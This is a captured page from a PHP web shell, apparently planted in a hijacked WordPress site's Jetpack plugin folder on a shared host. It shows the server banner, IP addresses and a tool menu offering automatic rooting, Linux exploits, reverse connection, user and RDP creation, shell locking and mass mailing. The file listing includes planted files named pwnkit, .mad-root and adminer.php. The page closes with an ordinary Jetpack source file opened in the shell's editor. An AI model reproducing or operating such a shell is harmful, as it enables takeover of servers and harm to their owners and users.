Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.svnignore
151
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
120.31
KB
-rw-r--r--
class.frame-nonce-preview.php
2.18
KB
-rw-r--r--
class.jetpack-admin.php
8.26
KB
-rw-r--r--
class.jetpack-autoupdate.php
6.79
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
2.94
KB
-rw-r--r--
class.jetpack-cli-call.php
25.22
KB
-rw-r--r--
class.jetpack-cli.php
20.53
KB
-rw-r--r--
class.jetpack-client-server.ph...
8.31
KB
-rw-r--r--
class.jetpack-client.php
10.3
KB
-rw-r--r--
class.jetpack-connection-banne...
24.73
KB
-rw-r--r--
class.jetpack-constants.php
2.35
KB
-rw-r--r--
class.jetpack-data.php
4.37
KB
-rw-r--r--
class.jetpack-debugger.php
19.68
KB
-rw-r--r--
class.jetpack-error.php
47
B
-rw-r--r--
class.jetpack-heartbeat.php
4.51
KB
-rw-r--r--
class.jetpack-idc.php
19.76
KB
-rw-r--r--
class.jetpack-ixr-client.php
3.2
KB
-rw-r--r--
class.jetpack-jitm.php
17.71
KB
-rw-r--r--
class.jetpack-modules-list-tab...
11.12
KB
-rw-r--r--
class.jetpack-network-first.ph...
546
B
-rw-r--r--
class.jetpack-network-sites-li...
4.26
KB
-rw-r--r--
class.jetpack-network.php
22.98
KB
-rw-r--r--
class.jetpack-options.php
10.72
KB
-rw-r--r--
class.jetpack-post-images.php
17.62
KB
-rw-r--r--
class.jetpack-signature.php
8.29
KB
-rw-r--r--
class.jetpack-tracks.php
2.87
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
8.84
KB
-rw-r--r--
class.jetpack-user-agent.php
45.94
KB
-rw-r--r--
class.jetpack-xmlrpc-server.ph...
16.02
KB
-rw-r--r--
class.jetpack.php
205.39
KB
-rw-r--r--
class.json-api-endpoints.php
60.81
KB
-rw-r--r--
class.json-api.php
19.27
KB
-rw-r--r--
class.photon.php
33.33
KB
-rw-r--r--
composer.json
345
B
-rw-r--r--
functions.compat.php
2.38
KB
-rw-r--r--
functions.gallery.php
2.26
KB
-rw-r--r--
functions.global.php
260
B
-rw-r--r--
functions.opengraph.php
15.48
KB
-rw-r--r--
functions.photon.php
8.49
KB
-rw-r--r--
jetpack.php
5.72
KB
-rw-r--r--
json-api-config.php
255
B
-rw-r--r--
json-endpoints.php
132.2
KB
-rw-r--r--
locales.php
59.55
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
15.87
KB
-rw-r--r--
require-lib.php
982
B
-rw-r--r--
rest-api.md
6.14
KB
-rw-r--r--
uninstall.php
830
B
-rw-r--r--
webpack.config.js
3.13
KB
-rw-r--r--
wpml-config.xml
213
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.jetpack-network-sites-list-table.php
<?php if( ! class_exists( 'WP_List_Table' ) ) { require_once( ABSPATH . 'wp-admin/includes/class-wp-list-table.php' ); } class Jetpack_Network_Sites_List_Table extends WP_List_Table { public function get_columns() { // site name, status, username connected under $columns = array( 'cb' => '<input type="checkbox" />', 'blogname' => __( 'Site Name', 'jetpack' ), 'blog_path' => __( 'Path', 'jetpack' ), 'connected' => __( 'Connected', 'jetpack' ), ); return $columns; } public function prepare_items() { $jpms = Jetpack_Network::init(); // Deal with bulk actions if any were requested by the user $this->process_bulk_action(); // Get sites $sites = $jpms->wp_get_sites( array( 'exclude_blogs' => array( 1 ), 'archived' => false, ) ); // Setup pagination $per_page = 25; $current_page = $this->get_pagenum(); $total_items = count( $sites ); $sites = array_slice( $sites, ( ( $current_page-1 ) * $per_page ), $per_page ); $this->set_pagination_args( array( 'total_items' => $total_items, 'per_page' => $per_page ) ); $columns = $this->get_columns(); $hidden = array(); $sortable = array(); $this->_column_headers = array( $columns, $hidden, $sortable ); $this->items = $sites; } public function column_blogname( $item ) { // http://jpms/wp-admin/network/site-info.php?id=1 switch_to_blog( $item->blog_id ); $jp_url = admin_url( 'admin.php?page=jetpack' ); restore_current_blog(); $actions = array( 'edit' => '<a href="' . network_admin_url( 'site-info.php?id=' . $item->blog_id ) . '">' . __( 'Edit', 'jetpack' ) . '</a>', 'dashboard' => '<a href="' . get_admin_url( $item->blog_id, '', 'admin' ) . '">Dashboard</a>', 'view' => '<a href="' . get_site_url( $item->blog_id, '', 'admin' ) . '">View</a>', 'jetpack-' . $item->blog_id => '<a href="' . $jp_url . '">Jetpack</a>', ); return sprintf('%1$s %2$s', '<strong>' . get_blog_option( $item->blog_id, 'blogname' ) . '</strong>', $this->row_actions($actions) ); } public function column_blog_path( $item ) { return '<a href="' . get_site_url( $item->blog_id, '', 'admin' ) . '">' . str_replace( array( 'http://', 'https://' ), '', get_site_url( $item->blog_id, '', 'admin' ) ) . '</a>'; } public function column_connected( $item ) { $jpms = Jetpack_Network::init(); $jp = Jetpack::init(); switch_to_blog( $item->blog_id ); if ( ! is_plugin_active( 'jetpack/jetpack.php' ) ) { $title = __( 'Jetpack is not active on this site.', 'jetpack' ); $action = array( 'manage-plugins' => '<a href="' . get_admin_url( $item->blog_id, 'plugins.php', 'admin' ) . '">' . __( 'Manage Plugins', 'jetpack' ) . '</a>', ); restore_current_blog(); return sprintf( '%1$s %2$s', $title, $this->row_actions( $action ) ); } if( $jp->is_active() ) { // Build url for disconnecting $url = $jpms->get_url( array( 'name' => 'subsitedisconnect', 'site_id' => $item->blog_id, ) ); restore_current_blog(); return '<a href="' . $url . '">Disconnect</a>'; } restore_current_blog(); // Build URL for connecting $url = $jpms->get_url( array( 'name' => 'subsiteregister', 'site_id' => $item->blog_id, ) ); return '<a href="' . $url . '">Connect</a>'; } public function get_bulk_actions() { $actions = array( 'connect' => 'Connect', 'disconnect' => 'Disconnect' ); return $actions; } function column_cb($item) { return sprintf( '<input type="checkbox" name="bulk[]" value="%s" />', $item->blog_id ); } public function process_bulk_action() { if( !isset( $_POST['bulk'] ) || empty ( $_POST['bulk'] ) ) return; // Thou shall not pass! There is nothing to do $jpms = Jetpack_Network::init(); $action = $this->current_action(); switch ( $action ) { case 'connect': foreach( $_POST['bulk'] as $k => $site ) { $jpms->do_subsiteregister( $site ); } break; case 'disconnect': foreach( $_POST['bulk'] as $k => $site ) { $jpms->do_subsitedisconnect( $site ); } break; } } } // end h
Close